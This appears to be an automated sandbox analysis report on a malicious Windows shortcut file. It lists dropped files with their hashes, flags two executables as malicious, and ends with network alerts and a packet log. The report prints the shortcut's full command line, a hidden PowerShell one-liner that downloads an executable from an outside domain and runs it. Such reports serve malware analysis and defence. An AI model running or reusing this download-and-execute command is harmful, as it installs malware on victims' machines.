                                                          Entropy (8bit):4.890472898059848
                                                          Encrypted:false
                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):246
                                                          Entropy (8bit):3.5085442896850614
                                                          Encrypted:false
                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8V6qelYH:Qw946cPbiOxDlbYnuRKkqYH
                                                          MD5:EEF024E86E913934807A416DEF28DD0D
                                                          SHA1:D7832AD98D68C2E792A7993E9088D37A268748B4
                                                          SHA-256:AEFCED29E55026F9C91310CC7AA4458CEBD86AEFFFB4520E087BA5FEB716CDEC
                                                          SHA-512:5E9C4164BA739AEA2F13D9738A0AD9EF9E9CE7F29CB92CB1548EE5A7DE9B3EB10F965E18676B92A81909EFB5627475B63D6DF1BAE151808D844DA703E6537CAF
                                                          Malicious:false
                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.1.2./.2.0.2.4. . .0.9.:.4.2.:.2.0. .=.=.=.....
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with very long lines (393)
                                                          Category:dropped
                                                          Size (bytes):16525
                                                          Entropy (8bit):5.346011504419146
                                                          Encrypted:false
                                                          SSDEEP:384:BqIxwGbWz/d64bJEaE3eErgEVCjzI8K7Wq2YUYNzgzxzOupDPdz4I9j8jI/BvfDJ:5bEd3NShrMdom
                                                          MD5:789D1F2F853618A17B73FBEF9532AB2F
                                                          SHA1:5322D042DC96B7E30E3914F7C21729559D534D3E
                                                          SHA-256:482DB450F9F106D18D3E1EAE7A160CC9E75201F9336327CDBCA465997BF56FB2
                                                          SHA-512:20E8E45817B30FE1B03ABE69E71C534EF8DA2015CE237E3F93FDF932D6CDE1FD126465530B61E56A32E9D65A3A6858A1B3B00806571A232876EACAD293871629
                                                          Malicious:false
                                                          Preview:SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:322+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):15113
                                                          Entropy (8bit):5.346111448009419
                                                          Encrypted:false
                                                          SSDEEP:384:aMApAQMAiAHPuQ2DUGDDD6f68IJJmRYBtRy/Y6QGKAyVMZAysNcHvI3c1i1Mte03:4xme
                                                          MD5:5033DD1CC5FD54EC5D4EFE2B613259C1
                                                          SHA1:591518FACF838F5513811A45CD083811B6491A15
                                                          SHA-256:BE7359AC4E8E694CF4CED41F4EDE6E0FBA4A523C621874BC5B14471BC52CDADD
                                                          SHA-512:E91983E0F2AD99B4E0AF2173956D92BF214FF6C43BE28A9D531A48B9001704C852961AA565971C8F06EA73B12B49CAFA1B39CAD1309CF28EE31914C3DA7D3336
                                                          Malicious:false
                                                          Preview:SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:889-0500 ThreadID=6052 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:896-0500 ThreadID=6052 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:896-0500 ThreadID=6052 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:896-0500 ThreadID=6052 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:896-0500 ThreadID=6052 Component=ngl-lib_NglAppLib Description="SetConf
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):35721
                                                          Entropy (8bit):5.4030671755105635
                                                          Encrypted:false
                                                          SSDEEP:192:Ncb/mILxcb2cbeLIFrcbCkcbAIp/cbVcbIIJDcbZcbCIY+cbhcbsSWtCR+ILlcb9:2PLH8FVfpBJnY0L+
                                                          MD5:F478F01F28645DC03C7B21CAB9EAF4A8
                                                          SHA1:2D8FDC8F060A1740C563F77D5D01A7BCA134A7E6
                                                          SHA-256:FB4497A001F8C2D7140F95BDAF2D1C5CA9CBB3C7DEF873E3F0B6D59EED15B4CA
                                                          SHA-512:0A675C0FFCEF6F04ABFBF148CF6599B19EF77247880AE74CC3FFEB48C26A24F435881A10D4477AE4F78FF80691A075E0D3C823C1DE61E36CC94DC1E1163961DD
                                                          Malicious:false
                                                          Preview:05-10-2023 12:57:02:.---2---..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 12:57:02:.Closing File..05-10-
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                          Category:dropped
                                                          Size (bytes):758601
                                                          Entropy (8bit):7.98639316555857
                                                          Encrypted:false
                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                          MD5:3A49135134665364308390AC398006F1
                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                          Malicious:false
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                          Category:dropped
                                                          Size (bytes):1407294
                                                          Entropy (8bit):7.97605879016224
                                                          Encrypted:false
                                                          SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
                                                          MD5:716C2C392DCD15C95BBD760EEBABFCD0
                                                          SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                                                          SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                                                          SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                                                          Malicious:false
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                          Category:dropped
                                                          Size (bytes):386528
                                                          Entropy (8bit):7.9736851559892425
                                                          Encrypted:false
                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                          Malicious:false
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                          Category:dropped
                                                          Size (bytes):1419751
                                                          Entropy (8bit):7.976496077007677
                                                          Encrypted:false
                                                          SSDEEP:24576:/ln9WL07oXGZnYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:Nn9WLxXGZnZGh3mlind9i4ufFXpAXkru
                                                          MD5:C25E2B4EFCEA3238A9DF836F5CE5788B
                                                          SHA1:EBF937B898C971E6B7589F886D7DE74A89549C33
                                                          SHA-256:36781B670387BEBD830312F6C5185EF4A394FDFA20CBE51F9CD7087FA6D9559E
                                                          SHA-512:982C66139E2195AEF5B3A33AD22F45949A72416F3291A217D133DEEF96A358B302AA5013D09EF5565736A27E7DF95E98B0BB13054B609A49D38EAB23843B5A82
                                                          Malicious:false
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PDF document, version 1.7, 1 pages
                                                          Category:dropped
                                                          Size (bytes):126079
                                                          Entropy (8bit):7.943849374898452
                                                          Encrypted:false
                                                          SSDEEP:3072:491AUlpumVlx1KDctCivx/JII6GE2XAYX:7wFVlxtvxXE2XL
                                                          MD5:883B3959460633ADD1FDDEB2B3060765
                                                          SHA1:A70C7DEB8F428678A43156C08267568984D0B712
                                                          SHA-256:82C26B4F1DE6AC3DB8689BDF21D64B63837DF027F37EA6878F799B5CB4D65596
                                                          SHA-512:EFCC6208349802B6EC36DF856718AD91C63A6D13FDBA712635D84A880269C0357B009D8A710B2CFECEB77AE07B46DC9BC84F4053F4E45C56FE4778A5A464E7BF
                                                          Malicious:false
                                                          Preview:%PDF-1.7.%.....1 0 obj .<<./ColorSpace /DeviceRGB./Subtype /Image./Height 1083./Filter /FlateDecode./Type /XObject./Width 851./BitsPerComponent 8./Length 125221.>>.stream.x...e.$..q\.{..................].w..n..Cp. y...../gU...cHf_.f..]ud.-.SU.S.%I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I..*~....=.$I.$I.....W_..CH.$I.$I~.......!$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I2@|..}...{.{...[n....r.SO=....kp.-I.$I.?/....?.O?....|....{pO:I.$I.dHd...Z..b.5..K~...=.$I.$I.!..g.q.:..J..f.].7.x..tP.NN.$I.$.`!..Xc....n6h.h...o..F.)._.$I.$.`$..4.L...O.7hx...9...2._.$I.$.`...z....G........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):55442611
                                                          Entropy (8bit):7.995576888470746
                                                          Encrypted:true
                                                          SSDEEP:1572864:LGW80LX5WJoWbgWRSgkNOXWxtQSNVcr3yxp9jdf:LG7uX5M3gbcKCzr3gd
                                                          MD5:64D055F7D6DD51C4C52A8F781BBCDC70
                                                          SHA1:893311064187577FBF1FF72B9AD1715BFA27D43B
                                                          SHA-256:24759BF786626DC098C0A9A009C9C9D427867CEDF6CE68E20C8D5A9F9F9D5328
                                                          SHA-512:081D6202401885A7ED62F278DAEFBCACDD923E13A9AAACBE2298CA5E7E6FE3D60C9A340AE84AFE934095550EFD433AD808E8177E4CB4B4166BAFF59626A748A7
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d...R.<g.........."....(.....\.................@.........................................`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64456
                                                          Entropy (8bit):7.748470243900274
                                                          Encrypted:false
                                                          SSDEEP:1536:sOzhJIRg5Xji0araoUBeV9aE4f2bmKF60N+92+na7RGJfx:sAICkZQ+gT4+aVG
                                                          MD5:1CEB5D0CB063290C1F66FCCFED96A220
                                                          SHA1:09B735E87DD4EF4917D2E1BCD969408C3AC099FD
                                                          SHA-256:AA278FEDF75CA629997113488D789E91F73A275575C22194C7BF7D59B30C9BC9
                                                          SHA-512:4E17A9D98C1EA9DB1F330D7475BED55A0C662CE5E546145EB8C1973FDF702571179A51BA39AA2C983F8CE42AA6EDB1A72F1A20E9F7DE78950F94076EDC9527D0
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...eD............/...........................@..............................................G@......t...............J.......................!..<....@.......0...........)..........................................................."..P...........................T10B924G............................ ..`G8MCUXOZ`.... ......................@...Z2TXZQUP.....0......................@..@SRW4MTG9.....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6221
                                                          Entropy (8bit):3.726926529711149
                                                          Encrypted:false
                                                          SSDEEP:48:W++/scj3CFU2UZ0mj6ukvhkvklCyw2Sbyml+SSogZoYFybyml+SSogZom1:36bLCKNZjXkvhkvCCttbymyHGbymyH1
                                                          MD5:ADB86F13B82FB4B4C1BD7CF6AF3B649D
                                                          SHA1:A34625506B1891C762A61354565CA5254680E970
                                                          SHA-256:041C15DF38C7B220F3125043C7B23DCD46F264AA07F0D3390A76DCA9CC3FE2EC
                                                          SHA-512:0C2A10858C27DCE0759736490063577900418FB474482B1B516E36D9257AB5C42AC9B7A631E610E975D62D120513CBF769F88AAB121BEA64FEA572A4DE3BB38C
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ...]...z...*.<..G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z...|Q...G....F..G......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y;u..........................B...A.p.p.D.a.t.a...B.V.1......Y9u..Roaming.@......EW.V.Y9u..........................@...R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y<u..............................M.i.c.r.o.s.o.f.t.....V.1.....EW(Y..Windows.@......EW.VEW(Y..........................r...W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VEW.X....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VEW.X....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.YCu................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5394
                                                          Entropy (8bit):3.4947755527622553
                                                          Encrypted:false
                                                          SSDEEP:48:ulbUWT67dLXuHISbymlxSSogZoYFybyml+SSogZom1:ulABxuXbymjHGbymyH1
                                                          MD5:A9FCA49BBE448D370CAEA10586DDDB51
                                                          SHA1:B816A5E887953C61A0080773C25FC04FD82581AB
                                                          SHA-256:9A24A8635D9817423E411F9762300346620C8F3072E76F0BAD7320A47401A62B
                                                          SHA-512:9BABB673886E857840CF881014061AD6E015BA7F10A740B4FCCC33729A383A9DC28C620EA2C98155FEDD83C5F987555A2EACF29C3473E58085707F8EB5BB4686
                                                          Malicious:false
                                                          Preview:...................................FL..................F.`.. ....c"_|....|..G.......G...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........z...!. a|...".~..G....j.2......Y<u .IFHQCK~1.LNK..N......EW'Y.Y<u..........................`...I.F.h.q.c.K.a.I.o.l...l.n.k.......T...............-.......S.............S.....C:\Users\user\Desktop\IFhqcKaIol.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):55
                                                          Entropy (8bit):4.306461250274409
                                                          Encrypted:false
                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                          Malicious:false
                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                          File type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                          Entropy (8bit):2.9398848978889105
                                                          TrID:
                                                          • Windows Shortcut (20020/1) 100.00%
                                                          File name:IFhqcKaIol.lnk
                                                          File size:2'458 bytes
                                                          MD5:5ca10c53b0ae072b40f7f69b58e9d43e
                                                          SHA1:268367cfec3f452fbd7f33a4a00bc5cc1950a679
                                                          SHA256:7d85db4c15db793280a65ddf0f1713e88f62f0eb87f00a4b4b6c3431eff4ccb9
                                                          SHA512:5f3ca74ee3df59150955d7516c8eac8d3e08618bd531f1e1a634bdc540917db09745cee9e797eb0ca2319cba3b4844776f499d06d28ec81297d57f2f6930b38a
                                                          SSDEEP:48:8M5aMueHJQWhLwzL0KBH/KVdLXuHfaPb:8M5hHJpLyYAH/2u/a
                                                          TLSH:475135102FE60314F7B3AE3568BAA22299B77C45DE21DF4D01604A4C1472624E479F7B
                                                          File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                          Icon Hash:72d282828e8d8dd5

                                                          General

                                                          Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Command Line Argument:-Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
                                                          Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          Timestamp:2024-12-06T15:42:04.041665+0100
                                                          SID:2019714
                                                          Signature:ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
                                                          Severity:2
                                                          Source IP:192.168.2.11
                                                          Source Port:49706
                                                          Dest IP:101.99.75.174
                                                          Dest Port:443
                                                          Protocol:TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 6, 2024 15:42:36.198445082 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.212455988 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.212538004 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.212616920 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.212635994 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.212661982 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.228120089 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.228262901 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.228281975 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.238219976 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.238296986 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.238313913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.253317118 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.253359079 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.253432989 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.253454924 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.253468037 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.271791935 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.271975040 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.272005081 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.285185099 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.285232067 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.285362005 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.285386086 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.285399914 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.291085005 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.291183949 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.291194916 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.296107054 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.296185970 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.296200991 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.303170919 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.303244114 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.303261995 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.308727980 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.308883905 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.308893919 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.314496994 CET44349794101.99.75.174192.168.2.11
